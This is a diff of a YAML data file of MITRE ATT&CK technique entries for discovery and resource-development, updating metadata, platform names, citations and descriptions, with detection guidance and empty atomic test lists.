+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - IaaS
       - Network
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.5'
-      x_mitre_contributors:
-      - Regina Elwell
-      - Sudhanshu Chauhan, @Sudhanshu_C
-      - Isif Ibrahima, Mandiant
-      - Austin Clark, @c2defense
+      - Identity Provider
+      - SaaS
+      - Office Suite
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Metadata'
       - 'Command: Command Execution'
@@ -50642,9 +51335,8 @@ discovery:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1201
     atomic_tests: []
   T1614.001:
@@ -50687,7 +51379,7 @@ discovery:
         description: Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses
           the Doppelgänging technique. Retrieved May 22, 2018.
         url: https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:00:56.174Z'
       name: 'System Location Discovery: System Language Discovery'
       description: "Adversaries may attempt to gather information about the system
         language of a victim in order to infer the geographical location of that host.
@@ -50726,13 +51418,11 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1614.001
     atomic_tests: []
   T1012:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-03T18:56:37.011Z'
       name: Query Registry
       description: |-
         Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
@@ -50773,87 +51463,85 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1012
     atomic_tests: []
   T1614:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      - macOS
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:07:23.511Z'
+      name: System Location Discovery
+      description: |2-
+
+        Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+        Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
+
+        Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: discovery
       x_mitre_contributors:
       - Pooja Natarajan, NEC Corporation India
       - Hiroki Nagahama, NEC Corporation
       - Manikantan Srinivasan, NEC Corporation India
       - Wes Hurd
       - Katie Nickels, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
+
+        Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling <code> GetLocaleInfoW</code> to gather information.(Citation: FBI Ragnar Locker 2020)
+
+        Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      - IaaS
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Process: OS API Execution'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
       created: '2021-04-01T16:42:08.735Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1614
         url: https://attack.mitre.org/techniques/T1614
-      - source_name: FBI Ragnar Locker 2020
-        url: https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
-        description: FBI. (2020, November 19). Indicators of Compromise Associated
-          with Ragnar Locker Ransomware. Retrieved April 1, 2021.
-      - source_name: Sophos Geolocation 2016
-        url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
-        description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
-          target you based on where you live. Retrieved April 1, 2021.'
+        external_id: T1614
       - source_name: Bleepingcomputer RAT malware 2020
-        url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
         description: Abrams, L. (2020, October 23). New RAT malware gets commands
           via Discord, has ransomware feature. Retrieved April 1, 2021.
+        url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
       - source_name: AWS Instance Identity Documents
-        url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
         description: Amazon. (n.d.). Instance identity documents. Retrieved April
           2, 2021.
-      - source_name: Microsoft Azure Instance Metadata 2021
-        url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
-        description: Microsoft. (2021, February 21). Azure Instance Metadata Service
-          (Windows). Retrieved April 2, 2021.
+        url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
       - source_name: Securelist Trasparent Tribe 2020
-        url: https://securelist.com/transparent-tribe-part-1/98127/
         description: 'Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis,
           part 1. Retrieved April 1, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
-      name: System Location Discovery
-      description: |2-
-
-        Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
-        Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
-
-        Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: discovery
-      x_mitre_detection: |-
-        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
-
-        Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling <code> GetLocaleInfoW</code> to gather information.(Citation: FBI Ragnar Locker 2020)
-
-        Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
-      x_mitre_version: '1.0'
+        url: https://securelist.com/transparent-tribe-part-1/98127/
+      - source_name: FBI Ragnar Locker 2020
+        description: FBI. (2020, November 19). Indicators of Compromise Associated
+          with Ragnar Locker Ransomware. Retrieved September 12, 2024.
+        url: https://s3.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
+      - source_name: Microsoft Azure Instance Metadata 2021
+        description: Microsoft. (2021, February 21). Azure Instance Metadata Service
+          (Windows). Retrieved April 2, 2021.
+        url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
+      - source_name: Sophos Geolocation 2016
+        description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
+          target you based on where you live. Retrieved April 1, 2021.'
+        url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Process: OS API Execution'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1614
     atomic_tests: []
   T1518.001:
@@ -50906,17 +51594,16 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1518.001
     atomic_tests: []
   T1526:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Cloud Service Discovery
       description: |-
-        An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
+        An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
 
-        Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
+        Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
 
         For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
 
@@ -50924,10 +51611,12 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Suzy Schapperle - Microsoft Azure Red Team
       - Praetorian
       - Thanabodi Phrakhun, I-SECURE
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
@@ -50936,15 +51625,16 @@ discovery:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Enumeration'
+      - 'Logon Session: Logon Session Creation'
       type: attack-pattern
       id: attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db
       created: '2019-08-30T13:01:10.120Z'
@@ -50972,9 +51662,6 @@ discovery:
         url: https://github.com/RhinoSecurityLabs/pacu
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1526
     atomic_tests: []
   T1018:
@@ -51049,7 +51736,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1018
     atomic_tests: []
   T1046:
@@ -51121,7 +51807,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1046
     atomic_tests: []
   T1518:
@@ -51170,12 +51855,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1518
     atomic_tests: []
   T1538:
     technique:
-      modified: '2024-04-19T04:25:33.300Z'
+      modified: '2024-10-15T15:51:56.279Z'
       name: Cloud Service Dashboard
       description: |-
         An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
@@ -51196,12 +51880,11 @@ discovery:
       - enterprise-attack
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - IaaS
-      - Google Workspace
       - SaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -51226,7 +51909,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1622:
     technique:
@@ -51281,7 +51963,7 @@ discovery:
         Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>IsDebuggerPresent()</code> and <code> NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
 
         Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>OutputDebugStringW()</code>.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-16T15:05:55.918Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Debugger Evasion
       x_mitre_detection: |-
@@ -51301,7 +51983,6 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1622
     atomic_tests: []
   T1124:
@@ -51404,13 +52085,12 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1124
     atomic_tests: []
 resource-development:
   T1583:
     technique:
-      modified: '2024-02-28T21:13:02.648Z'
+      modified: '2024-10-16T20:03:59.884Z'
       name: Acquire Infrastructure
       description: |-
         Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase.
@@ -51421,7 +52101,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Shailesh Tiwary (Indian Army)
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: "Consider use of services that may aid in tracking of newly
         acquired infrastructure, such as WHOIS databases for domain registration information.
@@ -51492,29 +52172,28 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.007:
     technique:
-      modified: '2022-10-20T21:20:22.578Z'
+      modified: '2024-07-01T20:24:16.562Z'
       name: Serverless
       description: |-
-        Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
+        Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
 
-        Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
+        Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS Apps Script Abuse 2021) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers - making it easier to [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
-      x_mitre_detection: ''
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
+      x_mitre_contributors:
+      - Awake Security
       x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Awake Security
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -51538,15 +52217,18 @@ resource-development:
         description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
           Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
         url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+      - source_name: GWS Apps Script Abuse 2021
+        description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+          Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.007:
     technique:
-      modified: '2024-04-15T23:49:14.558Z'
+      modified: '2024-09-12T19:18:36.583Z'
       name: Artificial Intelligence
       description: |
         Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
@@ -51578,17 +52260,16 @@ resource-development:
         url: https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/
       - source_name: OpenAI-CTI
         description: OpenAI. (2024, February 14). Disrupting malicious uses of AI
-          by state-affiliated threat actors. Retrieved March 11, 2024.
-        url: https://openai.com/blog/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors
+          by state-affiliated threat actors. Retrieved September 12, 2024.
+        url: https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.008:
     technique:
-      modified: '2024-04-19T12:24:40.659Z'
+      modified: '2024-10-15T15:10:59.530Z'
       name: Network Devices
       description: |-
         Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting.
@@ -51641,11 +52322,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.008:
     technique:
-      modified: '2023-04-17T15:32:39.470Z'
+      modified: '2024-10-16T20:10:08.246Z'
       name: Malvertising
       description: "Adversaries may purchase online advertisements that can be abused
         to distribute malware to victims. Ads can be purchased to plant as well as
@@ -51681,7 +52361,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Tom Hegel
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Hiroki Nagahama, NEC Corporation
       - Manikantan Srinivasan, NEC Corporation India
       - Pooja Natarajan, NEC Corporation India
@@ -51730,43 +52410,12 @@ resource-development:
         url: https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.004:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
-      type: attack-pattern
-      created: '2020-10-01T02:14:18.044Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588.004
-        url: https://attack.mitre.org/techniques/T1588/004
-      - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
-          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
-        source_name: DiginotarCompromise
-        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
-      - source_name: Let's Encrypt FAQ
-        url: https://letsencrypt.org/docs/faq/
-        description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
-          October 15, 2020.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      - source_name: Recorded Future Beacon Certificates
-        url: https://www.recordedfuture.com/cobalt-strike-servers/
-        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
-          Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:19:41.567Z'
       name: Digital Certificates
       description: |-
         Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.
@@ -51779,18 +52428,49 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
 
         Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Certificate: Certificate Registration'
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
+      created: '2020-10-01T02:14:18.044Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588/004
+        external_id: T1588.004
+      - source_name: DiginotarCompromise
+        description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+      - source_name: Recorded Future Beacon Certificates
+        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+          Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+        url: https://www.recordedfuture.com/research/cobalt-strike-servers
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Let's Encrypt FAQ
+        description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
+          October 15, 2020.
+        url: https://letsencrypt.org/docs/faq/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1583.002:
     technique:
@@ -51812,7 +52492,7 @@ resource-development:
         url: https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/
         description: 'Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can
           be (ab)used by malicious actors. Retrieved October 3, 2020.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T02:49:49.702Z'
       name: DNS Server
       description: |-
         Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
@@ -51828,8 +52508,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
